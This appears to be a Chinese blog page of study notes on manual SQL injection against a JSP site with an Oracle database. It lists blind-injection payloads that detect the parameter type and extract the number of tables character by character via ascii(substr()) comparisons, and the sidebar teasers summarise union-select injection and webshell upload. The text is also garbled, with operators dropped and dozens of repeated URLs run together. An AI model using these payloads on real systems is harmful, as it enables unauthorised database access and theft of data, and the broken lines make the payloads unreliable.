手工注射JSP学习

最新推荐文章于 2024-05-06 11:07:47 发布
最新推荐文章于 2024-05-06 11:07:47 发布
阅读量645 收藏
点赞数
分类专栏: 网络安全-注入专题 文章标签: jsp user 数据库


1、 判断注入类型(数字型还是字符型)
字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)
 And user>char(0)
 And user http://www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1
 ' And userchar(0) And '%25'='
 ' And userchar(0) And (' ')=('
 ') And user http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
 And str(98)

 ' And str(98)>str(97) And '1'='1
 ' And str(98)str(97) And '%25'='

 

' And user http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)str(97) And (' ')=('
 ') And str(98)

出现正常的页面:
 And USER>CHR(0)
 And USER

2、 猜解表数量和表名

数据库数量为3:
 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

 And UNISTR(1)>UNISTR(0)

以下为猜解数据表数量
数据表第一位为:1

 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))


数据表第二位为:3
 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

数据表第三位为:1
 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117 http://www.test.net/index_kaoyan_view.jsp?id=117
xdfwsl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JSP学习心得
01-08
作者:徐春金下面是本人在学习JSP时的一些心得: 一、JSP工作原理在一个JSP文件第一次被请求时,JSP引擎把该JSP文件转换成为一个servlet。而这个引擎本身也是一个servlet,在JSWDK或WEBLOGIC中,它就是JspServlet。 ...
MySQL 手工注入常用语句
热门推荐
龙哥盟
03-02 4万+
判断是否存在SQL注入' and 1=1 and 1=2暴字段长度Order by 数字匹配字段and 1=1 union select 1,2,..,n暴字段位置and 1=2 union select 1,2,..,n利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select ve
Spring 框架学习
骚戴的博客
02-08 824
Spring 框架学习
常用手工注入语句
ONS_cukuyo的博客
09-17 1193
以下内容的来源忘了,仅做转载当作笔记,侵删 Sql常用手工注入语句 and exists(select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 and 1=(select d...
Oracle web环境注射技术
abc11111118的博客
04-25 69
创建时间:2008-03-19文章属性:原创文章提交:T_Torchidy (jnchaha_at_163.com)Oracle web环境注射技术##BY剑心#http://www.loveshell.net/#前言本人不是一个专业的数据库管理员,也不是一个专门研究oracle安全的研究员,文中的语句很多都写得非常不专业,对数据库理解也不够,甚至很多语句可能在不同版本上...
JSP-Servlet的工作流程
weixin_34411563的博客
09-02 267
Servlet基础     1.Servlet概述     JSP的前身就是Servlet。Servlet就是在服务器端运行的一段小程序。一个Servlet就是一个Java类,并且可以通过“请求-响应”编程模型来访问的这个驻留在服务器内存的Servlet程序。   2.Tomcat容器等级     Tomcat的容器分为4个等级,Servlet的容器管理Context容器,一个Con...
当Java遇见了Html--Jsp详解篇
方志朋的专栏
12-18 2万+
一、什么是Jspjsp是一种基于文本的程序,全名java server page,其特点是html和java程序共存。执行时jsp会被运行容器编译,编译后的jsp跟servlet一样,因此jsp是另一种形式的servlet。二、jsp页面组成jsp 页面包括以下内容: 静态内容 指令 表达式 小脚本 声明 注释 1.指令: page指令: 通常位于jsp页面的顶端,同一个页面可以有多个page指
mysql手工注入
flydragonhero的专栏
03-31 223
暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user()  不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() ...
手工代码sql语句注入
Smile李先生
09-06 2049
暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user()   不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 uni
入侵基于java Struts的JSP网站
baduan2162的博客
12-25 63
入侵要点: 找到注入点 暴露网站页面绝对路径 利用mysql的load_file()读取网站配置信息找到管理后台 上传webshell 了解一下 Struts和.do : 首先了解一下什么是Struts。Struts是Apache基金会Jakarta项目组的一个Open Source项目,是一种优秀的J2EE MVC架构方式,它利用taglib获得可重用代码和抽象 Java...
JSP学习笔记
10-27
JSP学习笔记,想要学习jsp的朋友可以看下
JSP学习之JavaBean用法分析
10-23
主要介绍了JSP学习之JavaBean用法分析,较为详细的分析了JavaBean的功能、原理及使用注意事项,具有一定参考借鉴价值,需要的朋友可以参考下
Servle和JSP学习指南
07-22
资源名称:Servle和JSP学习指南内容简介: 《Servlet和JSP学习指南》是系统学习Servlet和JSP的必读之作。由全球知名的Java技术专家(《HowTomcat Works》作者)亲自执笔,不仅全面解读Servlet和JSP的*技术,重点...
Servlet和JSP学习指南
07-22
资源名称:Servlet和JSP学习指南资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
【课堂练习】
JacksonLeo的博客
04-29 535
虽然现代JVM的垃圾回收机制已经非常高效,但是在性能敏感的场合,仍然需要注意对象的创建频率。例如,在SysLogininforMapper中的deleteLogininforByIds方法,如果处理大量ID时,应考虑使用批处理技术,而不是循环单条处理。例如,在SysMenuMapper中的查询方法,如果涉及到复杂的查询条件或者大量数据的查询,应确保SQL语句的优化和索引的使用。异常处理:代码中应该有更明确的异常处理逻辑,比如使用try-catch块捕获可能的异常,并进行适当的处理,如记录日志、回滚事务等。
MySQL数据库练习(6)
a1677179的博客
04-29 327
MySQL数据库练习(6)
java线上问题排查之磁盘和网络查看分析(二)
wayne_youlu的博客
04-30 509
overflowed 标识全连接队列溢出的次数,最前面是0,标识没有队列溢出的情况,网络环境正常。来查看网络是否连接。如果出现下图内容,则证明网络已经连接。
(论文阅读-优化器)EFFICIENCY IN THE COLUMBIA DATABASE QUERY OPTIMIZER
最新发布
junerli的博客
05-06 768
查询优化是一个数据库系统能够获得重要性能收益的领域。现代数据库应用通常要求优化器具有高可扩展性和效率。Columbia基于Cascades优化框架的自顶向下优化算法,通过对搜索空间结构和搜索算法的精心重构,简化了自顶向下优化器的设计。
servlet和jsp学习指南 pdf
09-02
Servlet和JSP学习指南PDF是一本关于JavaWeb开发的指南,旨在帮助学习者深入理解和掌握Servlet和JSP技术。 Servlet是Java Web开发中常用的一种技术,用于处理Web请求和响应。它基于Java语言,提供了一组用于处理HTTP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值